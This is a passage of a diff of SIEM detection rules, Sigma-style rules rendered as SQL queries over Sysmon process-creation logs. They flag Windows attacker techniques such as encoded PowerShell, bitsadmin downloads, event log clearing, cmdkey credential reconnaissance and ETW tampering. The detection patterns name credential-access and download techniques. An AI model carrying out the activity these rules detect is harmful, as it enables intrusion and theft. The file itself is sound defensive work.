'%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + 
"attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": 
"proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", 
@@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' 
ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE 
'\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN 
('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 